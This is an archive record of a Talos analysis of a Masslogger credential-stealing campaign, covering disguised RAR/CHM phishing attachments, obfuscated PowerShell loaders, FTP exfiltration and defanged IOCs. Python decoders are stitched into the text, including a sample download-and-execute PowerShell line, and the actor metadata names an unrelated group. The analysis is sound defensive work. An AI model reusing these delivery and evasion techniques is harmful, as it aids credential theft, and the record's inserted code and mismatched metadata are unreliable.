{
	"id": "d6480334-a88a-4d1a-8c83-f1732519d061",
	"created_at": "2026-04-06T01:31:50.349167Z",
	"updated_at": "2026-04-10T13:12:27.508856Z",
	"deleted_at": null,
	"sha1_hash": "1caf3b4641cd170266316ed31e907de7ec4b6e7e",
	"title": "Masslogger campaigns exfiltrates user credentials",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2232838,
	"plain_text": "Masslogger campaigns exfiltrates user credentials\r\nBy Nick Biasini\r\nPublished: 2021-02-17 · Archived: 2026-04-06 00:44:42 UTC\r\nWednesday, February 17, 2021 08:00\r\nBy Vanja Svajcer.\r\nNews summary\r\nAs protection techniques develop, attackers are finding it harder to successfully attack their targets and\r\nmust find creative ways to succeed.\r\nCisco Talos recently discovered a campaign utilizing a variant of the Masslogger trojan designed to retrieve\r\nand exfiltrate user credentials from multiple sources such as Microsoft Outlook, Google Chrome and\r\ninstant messengers.\r\nApart from the initial email attachment, all the stages of the attacks are fileless and they only occur in\r\nvolatile memory.\r\nThese threats demonstrate several techniques of the MITRE ATT\u0026CK framework, most notably T1566 —\r\nPhishing, T1059.001 and T1059.007 — Command and Scripting Interpreters, T1140 —\r\nDeobfuscate/Decode Files or Information, T1497 — Virtualization/Sandbox Evasion, T1555.003 —\r\nCredentials from Web Browsers, T1115 — Clipboard Data, T1056.001 — Keylogging and T1048.003 —\r\nExfiltration Over Unencrypted/Obfuscated Non-C2 Protocol.\r\nAttackers are constantly reinventing ways to monetize their tools. Cisco Talos recently discovered an interesting\r\ncampaign affecting Windows systems and targeting users in Turkey, Latvia and Italy, although similar campaigns\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 1 of 17\n\nby the same actor have also been targeting users in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain in\r\nSeptember, October and November 2020.\r\nThe actor employs a multi-modular approach that starts with the initial phishing email and carries through to the\r\nfinal payload. The adversaries behind this campaign likely do this to evade detection. 
But it can also be a\r\nweakness, as there are plenty of opportunities for defenders to break the killchain.\r\nWhat's new?\r\nAlthough operations of the Masslogger trojan have been previously documented, we found the new campaign\r\nnotable for using the compiled HTML file format to start the infection chain. This file format is typically used for\r\nWindows Help files, but it can also contain active script components, in this case JavaScript, which launches the\r\nmalware's processes.\r\nHow did it work?\r\nThe infection starts with an email message containing a legitimate-looking subject line that seems to relate to a\r\nbusiness. The email contains a RAR attachment with a slightly unusual filename extension.\r\nThe usual filename extension for RAR files is .rar. However, RAR-compressed archives can also be split into\r\nmulti-volume archives, whose additional volumes carry the extensions .r00, .r01 and onwards. In this case, the attachment is a single RAR archive named with such a multi-volume extension, starting from \".r00\", and the archive holds one file with the .chm file extension. This naming scheme is used by the Masslogger campaign, presumably to bypass any\r\nprograms that would block the email attachment based on its file extension.\r\nCHM is a compiled HTML file that contains an embedded HTML file with JavaScript code to start the active\r\ninfection process. Every stage of the infection is obfuscated to avoid detection using simple signatures.\r\nThe second stage is a PowerShell script that eventually deobfuscates into a downloader and downloads and loads\r\nthe main PowerShell loader. The Masslogger loaders seem to be hosted on compromised legitimate hosts with a\r\nfilename containing one letter and a one- or two-digit number concatenated with the filename extension .jpg. For example,\r\n\"D9.jpg\".\r\nThe main payload is a variant of the Masslogger trojan designed to retrieve and exfiltrate user credentials from a\r\nvariety of sources, targeting home and business users. 
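The attachment trick summarized above (a RAR archive renamed to a multi-volume extension such as .r00, holding a .chm file) is best caught by looking at file content rather than the file name. The following Python is an added example, not code from the original post or from Talos: it identifies RAR and CHM containers by their header bytes and flags the extension mismatch. The sample attachments are constructed (header bytes plus filler) and the file names are illustrative.

```python
import re

# Magic bytes written out as byte values so the block needs no escape
# sequences: RAR 4.x archives start with Rar! 1A 07 00, RAR 5.x with
# Rar! 1A 07 01 00, and compiled HTML help (CHM) files start with ITSF.
RAR4_MAGIC = bytes([0x52, 0x61, 0x72, 0x21, 0x1A, 0x07, 0x00])
RAR5_MAGIC = bytes([0x52, 0x61, 0x72, 0x21, 0x1A, 0x07, 0x01, 0x00])
CHM_MAGIC = b'ITSF'

# Old-style RAR multi-volume extensions (.r00, .r01, ...), as abused here.
MULTI_VOLUME_RE = re.compile(r'[.]r[0-9]{2}$')


def sniff(data: bytes) -> str:
    '''Identify the container by its header, ignoring the file name.'''
    if data.startswith(RAR5_MAGIC) or data.startswith(RAR4_MAGIC):
        return 'rar'
    if data.startswith(CHM_MAGIC):
        return 'chm'
    return 'unknown'


def triage_attachment(name: str, data: bytes) -> dict:
    '''Flag the two tricks the campaign relies on: a RAR archive whose name
    does not end in .rar (for instance a .r00 volume extension) and a CHM
    file, which can carry script. The verdict is based on content, not on
    the extension alone, so renaming the file does not help the sender.'''
    kind = sniff(data)
    lower = name.lower()
    flags = []
    if kind == 'rar' and not lower.endswith('.rar'):
        flags.append('rar-content-with-nonstandard-extension')
    if MULTI_VOLUME_RE.search(lower):
        flags.append('rar-multi-volume-extension')
    if kind == 'chm' or lower.endswith('.chm'):
        flags.append('compiled-html-help')
    return {'name': name, 'detected': kind, 'flags': flags, 'block': bool(flags)}


# Constructed sample attachments (header bytes plus zero filler), not real samples.
SAMPLES = [
    ('70727_YK90054_Teknik_Cizimler.r00', RAR5_MAGIC + bytes(24)),
    ('Teknik_Cizimler.chm', CHM_MAGIC + bytes(28)),
    ('quote.rar', RAR4_MAGIC + bytes(25)),
    ('invoice.pdf', b'%PDF-1.4' + bytes(24)),
]


def triage_all(samples=SAMPLES) -> list:
    '''Run the check over every sample and return one verdict per attachment.'''
    return [triage_attachment(name, data) for name, data in samples]


if __name__ == '__main__':
    for verdict in triage_all():
        print(verdict)
```

A gateway rule built on this check blocks the archive whatever it is called, and a .chm arriving by mail is treated as active content rather than documentation. The plain quote.rar sample is deliberately not flagged here; whether to block every RAR archive is a separate policy decision.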
Masslogger can be configured as a keylogger, but in this\r\ncase, the actor has disabled this functionality.\r\nSo what?\r\nWhile most of the public attention seems to be focused on ransomware attacks, big game hunting and APTs, it is\r\nimportant to keep in mind that crimeware actors are still active and can inflict significant damage to organizations\r\nby stealing users' credentials. The credentials themselves have value on the dark web and actors sell them for\r\nmoney or use them in other attacks.\r\nBased on the IOCs we retrieved, we have moderate confidence that this actor has previously used other payloads\r\nsuch as AgentTesla, Formbook and AsyncRAT in campaigns starting as early as April 2020.\r\nTechnical case overview\r\nIntroduction\r\nMasslogger is a spyware program written in .NET with a focus on stealing user credentials, mostly from the\r\nbrowsers but also from several popular messaging applications and email clients. It was released in April 2020 and\r\nsold on underground forums for a moderate price with a few licensing options.\r\nThe exfiltration of data takes place over one or more of these channels:\r\nFTP (plain text over default port 21); the configuration contains the FTP user credentials.\r\nHTTP — Using a PHP-based control panel.\r\nSMTP — The user has to specify email address, server and credentials to use it.\r\nWe won't dig deep into the functionality of the final Masslogger payload, as this was previously well-described by other researchers. Instead, we'll focus on the infection vector and the memory-only delivery\r\nchain before the final stage is loaded. In the case of commodity spyware such as Masslogger, it is the infection\r\nchain and contextual information that distinguish the individual actors behind each campaign.\r\nThe infection chain we follow seems to focus on business users, with email being the infection vector. 
The email\r\ncontains a RAR attachment holding a compiled HTML (.chm) file. The rest of the chain is split between\r\nJavaScript, PowerShell and .NET.\r\nEmail as an infection vector\r\nThe latest campaign began in mid-January. Based on the combination of discovered emails and file names, we\r\nbelieve it was targeting organizations in Turkey, Latvia and Italy. We have observed similar campaigns happening\r\nin several instances before, starting no later than September 2020. In previous campaigns, the actor was targeting\r\nusers in Bulgaria, Lithuania, Hungary, Estonia, Romania and Spain.\r\nEuropean countries targeted by the observed Masslogger campaigns from September 2020.\r\nThe email is written in the language of the targeted recipient's top-level domain. The first example is an email\r\ntargeted at users in Turkey with the subject \"Domestic customer inquiry\" and the body \"At the request of our\r\ncustomer, please send your attached best quotes.\"\r\nEmail campaign example targeting users in Turkey.\r\nSome earlier campaigns were purported to be a request to open and sign a memorandum of understanding. The\r\nactor attempted to make emails more credible by adding a link to the legitimate scanning application to the email\r\nfooter \"Shipped with Genius Scan for iOS.\"\r\nFor the campaigns in September, October and November, the adversaries sent emails containing a subject line that\r\ntranslates to \"MOU Information\" with the text \"Please return it signed and stamped. 
Best regards,\" in the body.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 5 of 17\n\nAn example of an earlier email targeting users in Spain.\r\nAn example of an earlier email targeting users in Bulgaria.\r\nThe attachment file name for the latest campaign is chosen according to the email subject, with possible random\r\nstrings prepended, for example, \"70727_YK90054_Teknik_Cizimler.\" The attachment filename extension is\r\nchosen to bypass simple blockers that attempt to block RAR attachments using its default filename extension\r\n\".rar\". The actor changes the filename extension to RAR multi-volume filename extensions, starting from \".r00\".\r\nWinRAR and other RAR-capable unarchivers will still open the file without problems.\r\nThe attached RAR archive contains a single file with the \".chm\" filename extension. CHM stands for \"compiled\r\nHTML files,\" and it is one of the default formats for Windows Help files. Compiled HTML files can be easily\r\ncreated using the Windows HTML Help executable program hh.exe. The same program can be used with the\r\ncommand line option \"-decompile\" to extract the embedded and compressed HTML files.\r\nhttps://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html\r\nPage 6 of 17\n\nWhen the user opens the attachment with the default application, a simple HTML page is displayed, containing the\r\ntext \"Customer service, Please Wait…\"\r\nThe HTML page displayed when the .CHM attachment is opened.\r\nWhen the CHM file is decompiled and the HTML file extracted, it contains lightly obfuscated JavaScript code to\r\ncreate an HTML page. 
The HTML content is escaped and reversed, so it is easy to deobfuscate.\r\nObfuscated JavaScript code in the decompiled HTML file.\r\nThe HTML code contains an ActiveX object containing PowerShell code obfuscated in a similar way to strings in\r\nthe JavaScript code of the CHM file.\r\nHTML page with an ActiveX object embedded and PowerShell code.\r\nWhen deobfuscated, we can observe a PowerShell downloader stage, which simply connects to the download\r\nserver, usually a compromised legitimate host. The download server hosts the next stage of the infection.\r\nPowerShell downloader stage.\r\nThe URL to download the next stage ends in a path of the format [1Letter][1 to 2-digit number].jpg, for\r\nexample, hxxp://sinetcol[.]co/D7.jpg. This stage is encoded with a simple hexadecimal encoding scheme and is\r\nconverted to code by first splitting the downloaded content using the character \"^\" as the delimiter and then\r\nappending the ASCII character for each number to a string variable. Eventually, the string containing PowerShell\r\ncode is piped into the Invoke-Expression (IEX) cmdlet. This is the PowerShell loader.\r\nEncoded PowerShell loader\r\nThe PowerShell loader contains two encoded .NET assemblies. 
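The two decodings described above (the reversed, escaped HTML inside the CHM script, and the ^-delimited numbers that become the PowerShell loader) are mechanical enough to automate. The block below is an added example in Python, not the campaign's scripts and not Talos's tooling. It assumes that escaping happened before reversal (the post does not say, so the decoder tries both orders and keeps the one that yields markup) and that the ^-delimited numbers are hexadecimal, as the post states, with a base parameter in case a sample uses decimal. The sample strings are constructed; the decoded text is returned, never executed.

```python
import re

# Characters that JavaScript escape() leaves untouched.
_JS_SAFE = set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@*_+-./')
_JS_ESCAPE_RE = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')
_IEX_RE = re.compile(r'(?i)(invoke-expression|[|][ ]*iex)')


def js_escape(text: str) -> str:
    '''Python equivalent of JavaScript escape(); used here only to build the sample.'''
    out = []
    for ch in text:
        code = ord(ch)
        if ch in _JS_SAFE:
            out.append(ch)
        elif code < 256:
            out.append('%{:02X}'.format(code))
        else:
            out.append('%u{:04X}'.format(code))
    return ''.join(out)


def js_unescape(text: str) -> str:
    '''Python equivalent of JavaScript unescape(): %XX and %uXXXX back to characters.'''
    return _JS_ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def deobfuscate_chm_html(blob: str) -> str:
    '''Undo the escape-and-reverse obfuscation of the HTML inside the CHM script.
    The post does not say which of the two operations the author applied first,
    so both orders are tried and the candidate that looks like markup wins
    (assumption: the real page starts with a tag).'''
    candidates = (js_unescape(blob[::-1]), js_unescape(blob)[::-1])
    for cand in candidates:
        if cand.lstrip().startswith('<'):
            return cand
    return candidates[0]


def decode_caret_loader(blob: str, base: int = 16) -> str:
    '''Second-stage decoding as the post describes it: split on ^ and append
    the character for each number. The post calls the scheme hexadecimal, so
    base 16 is the default; pass base=10 if a sample turns out to use decimal.
    The decoded script is returned as text and never executed.'''
    return ''.join(chr(int(tok, base)) for tok in blob.split('^') if tok.strip())


def encode_caret_loader(script: str, base: int = 16) -> str:
    '''Inverse of decode_caret_loader; used here only to build the sample.'''
    fmt = '{:X}' if base == 16 else '{:d}'
    return '^'.join(fmt.format(ord(ch)) for ch in script)


def find_iex(script: str) -> bool:
    '''True if the decoded text hands itself to Invoke-Expression, the point
    where encoded text turns into running code.'''
    return _IEX_RE.search(script) is not None


# Constructed stand-ins for the campaign artefacts (not the real ones).
SAMPLE_HTML = '<html><body>Customer service, Please Wait...</body></html>'
SAMPLE_CHM_BLOB = js_escape(SAMPLE_HTML)[::-1]          # escaped, then reversed
SAMPLE_LOADER = '$s = (New-Object Net.WebClient).DownloadString($u); $s | IEX'
SAMPLE_CARET_BLOB = encode_caret_loader(SAMPLE_LOADER)  # 24^73^20^3D^...


def analyse_samples() -> dict:
    '''Run both decoders over the constructed samples.'''
    loader = decode_caret_loader(SAMPLE_CARET_BLOB)
    return {
        'html': deobfuscate_chm_html(SAMPLE_CHM_BLOB),
        'loader': loader,
        'pipes_into_iex': find_iex(loader),
    }


if __name__ == '__main__':
    for key, value in analyse_samples().items():
        print(key, ':', value)
```

On a real sample, feed decode_caret_loader the body fetched from the .jpg URL (taken from a sandbox or proxy capture rather than downloaded from an analyst workstation) and read the result for the Invoke-Expression hand-off, the reflective load of the embedded assembly and the msbuild.exe injection before going further; find_iex is the simplest of those checks.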
The first one is a DLL and the other an executable.\r\nLoader DLL and final Masslogger payload\r\nStart of the PowerShell loader.\r\nThe PowerShell loader first decodes the .NET DLL and then deobfuscates the string \"System.AppDomain\" to get\r\nthe reference to its method \"GetCurrentDomain.\" The loader then creates a byte array where it stores the\r\nMasslogger loader before it invokes the GetCurrentDomain function to get the context of execution and the\r\nprocess where the script is executing.\r\nThe acquired domain is then used to load the .NET DLL assembly into the powershell.exe process space with the\r\nassembly name \"Waves.dll.\" Waves employs a Costura loader, an open-source reflective assembly loader\r\nalternative to ILMerge and is obfuscated with DotNetGuard obfuscator, all to make analysis and detection more\r\ndifficult.\r\nOnce the DLL is loaded as a .NET assembly, the PowerShell loader calls the method tasked with creating a\r\nmsbuild.exe process, injecting the final payload into its process space and launching it.\r\nAfter decoding, the DLL loader assembly is created and loaded.\r\nThe Masslogger payload is stored in memory as a buffer compressed with gzip. The buffer is decompressed by the\r\nDLL loader. The internal assembly name of the payload is \"service-med-star.gr\", which is a concatenation of the\r\nusername and the server used for FTP credentials exfiltration.\r\nMasslogger is a credential stealer and keylogger with the ability to exfiltrate data through SMTP, FTP or HTTP\r\nprotocols. 
For the first two, no additional server-side components are required, while the exfiltration over HTTP is\r\ndone through the Masslogger control panel web application.\r\nThis version of Masslogger contains the functionality to target and retrieve credentials from the following\r\napplications:\r\nPidgin messenger client\r\nFileZilla FTP client\r\nDiscord\r\nNordVPN\r\nOutlook\r\nFoxMail\r\nThunderbird\r\nFirefox\r\nQQ Browser\r\nChromium based browsers (Chrome, Chromium, Edge, Opera, Brave)\r\nThe configuration for a payload is stored as an encrypted array of strings within the payload itself. Although the\r\nconfiguration is encrypted and the payload obfuscated with an unknown obfuscator, it is still possible to find the code\r\nused to decrypt the configuration, as previously documented by Mario Henkel.\r\nThe configuration is decrypted using the standard .NET framework functionality. This allows us to place a\r\nbreakpoint at the beginning of the methods of the System.Security.Cryptography.AesCryptoServiceProvider class and step\r\nback to the configuration decryption function within the payload body and trace the value returned to the caller\r\nafter each configuration string is decrypted.\r\nBreakpoints placed to decrypt the payload configuration.\r\nThe decrypted configuration is parsed by Masslogger to configure the trojan to target a specific set of applications\r\nand exhibit functionality. 
In our case, the Masslogger version we are dealing with is 3.0.7563.31381 and the\r\nexfiltration is conducted over FTP, with med-star.gr as the FTP exfiltration server.\r\nAlthough the payload is configured to use FTP, the actor has installed a version of the Masslogger control panel on\r\nthe same server with the URL hxxps://www[.]med-star[.]gr/panel/?/login.\r\nMasslogger control panel login screen.\r\nDecrypted Masslogger configuration strings.\r\nOnce the credentials from targeted applications are retrieved, they are uploaded to the exfiltration server with a\r\nfilename containing the username, two-letter country ID, unique machine ID and the timestamp for when the file\r\nwas created.\r\nUploaded credential files begin with the information about the user and the infected system, configuration options\r\nand processes running, followed by the retrieved credentials delimited by lines containing targeted application\r\nnames.\r\nThe beginning of an uploaded exfiltrated credentials file.\r\nConclusion\r\nWe attribute this recently discovered Masslogger campaign to an actor who has been launching similar credential-stealing campaigns since at least September 2020. There is moderate confidence the same actor previously\r\nused AgentTesla with similar goals in April 2020. The campaigns target several European countries,\r\nshifting focus monthly. 
In our research, we detected email messages targeting Turkey, Latvia, Lithuania,\r\nBulgaria, Hungary, Estonia, Romania, Italy and Spain, as well as messages written in English.\r\nMasslogger campaign modules.\r\nThe observed campaign is almost entirely executed and present only in memory, which emphasizes the importance\r\nof conducting regular and background memory scans. The only components present on disk are the attachment and\r\nthe compiled HTML help file.\r\nUsers are advised to configure their systems for logging PowerShell events such as module loading and executed\r\nscript blocks, as these will show the executed code in its deobfuscated form. Talos will continue to track similar\r\ncampaigns to make sure adequate protection is included in Cisco Secure products.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors. 
Exploit Prevention present within AMP is designed to protect customers from unknown attacks such\r\nas this automatically.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), Cisco ISR and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and builds protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nOSQuery\r\nCisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected\r\nwith this specific threat. 
For specific OSqueries on this threat, see https://github.com/Cisco-Talos/osquery_queries/blob/master/win_forensics/potential_compiled_HTML_abuse.yaml\r\nIOCs\r\nURLs\r\nhxxp://sinetcol[.]co/A7.jpg - January\r\nhxxp://sinetcol[.]co/D7.jpg - January\r\nhxxp://becasmedikal[.]com.tr/A5.jpg - January\r\nhxxp://risu[.]fi/D9.jpg - November\r\nhxxp://topometria[.]com.cy/A12.jpg - September\r\nhxxp://bouinteriorismo[.]com/R9.jpg - November\r\nhxxp://optovision[.]gr/4B.jpg - October\r\nhxxp://hotelaretes[.]gr/V8.jpg - October\r\nhxxp://jetfleet24[.]com/T5.jpg - October\r\nhxxps://www.med-star[.]gr/panel/?/login - C2 panel\r\nfxp://med-star[.]gr - exfiltration FTP\r\nEmail messages\r\n54ca02b013e898be2606f964bc0946430a276de9ef478596a1d33cb6f806db8c\r\n516d45fcbdbdc4526bdd0f6979fe3ad929b82e1fd31247c7891528703ac16131\r\n1c0a17a11a4b64dbe6082be807309a3c447b4861ea56155c1bfcf4d072746d38\r\n7c92e1befd1cc5fa4a253716ac8441f6e29a351b7e449d3b8ef171cb6181db8e\r\n83c64bf1c919c5e6ce25633d0eff2b7cda5b93a210b60372d984f862933e0b4e\r\ne2c3ad4bedf9e6d1122d418e97dfb743b1559a5af99befabed5bb7c6164028a8\r\n8129a86056aa28f2af87110bb25732b14b77f18a7c820d9bcf1adcd2c7d97a7a\r\nInitial scripts\r\n742b9912f329c05296e2f837555dceea0ae3e06e80aa178a9127692d25e21479 - September 2020, Windows batch\r\nfile\r\n04910322c2e91d58e9ed3c5bcc3a18be1ba1b5582153184d1f5da3d9c42bac15 - January 2021, CHM file\r\naac62b80b790d96882b4b747a8ed592f45b39ceadd9864948bb391f3f41d7f9f - January 2021, CHM file\r\nf946e1c690fc2125af4ad7d3d1b93c6af218a82d55a11a5a6ee5a9b04a763e7f - January 2021, CHM file\r\n9cd7622ade7408c03e0c966738f51f74f884fbafdf3fe97edf4be374a7fb1d77 - November 2020, CHM file\r\n5415bcc4bffa5191a1fac3ce3b11c46335d19f053f5d9d51a10f4ed77393ed82 - October 2020, CHM file\r\nDownloaded obfuscated PowerShell 
loaders\r\n0eef444f062ea06340ca7ef300cb39c44a6cdf7ead2732bb885d79f098991cb8\r\ndf929834de2b10efaa8b2cb67c71ae98508cfb79f22213ee24aedc38a962ccb5\r\nDLL loaders\r\n49fc4103d8747de341b9d3cd08f05c83f2e6943215df6939d02c7c3099345343\r\n39dbe72ea847012243e4642d766fd4cf6fe138302cbfba67c65088b2cdefc1f4\r\na16fa0a14f0d20b66af550e3cdb0b60f8ffb965415404df6cc8164e62dfbe124\r\nda256158ac0d7dc031b2541f9b7486d9822a402b6e9c5176c2ec2ed717592fbf\r\nMasslogger payload\r\n2487b12f52b803f5d38b3bb9388b039bf4f58c4b5d192d50da5fa047e9db828b\r\nSource: https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html"
	],
	"report_names": [
		"masslogger-cred-exfil.html"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439110,
	"ts_updated_at": 1775826747,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1caf3b4641cd170266316ed31e907de7ec4b6e7e.pdf",
		"text": "https://archive.orkl.eu/1caf3b4641cd170266316ed31e907de7ec4b6e7e.txt",
		"img": "https://archive.orkl.eu/1caf3b4641cd170266316ed31e907de7ec4b6e7e.jpg"
	}
}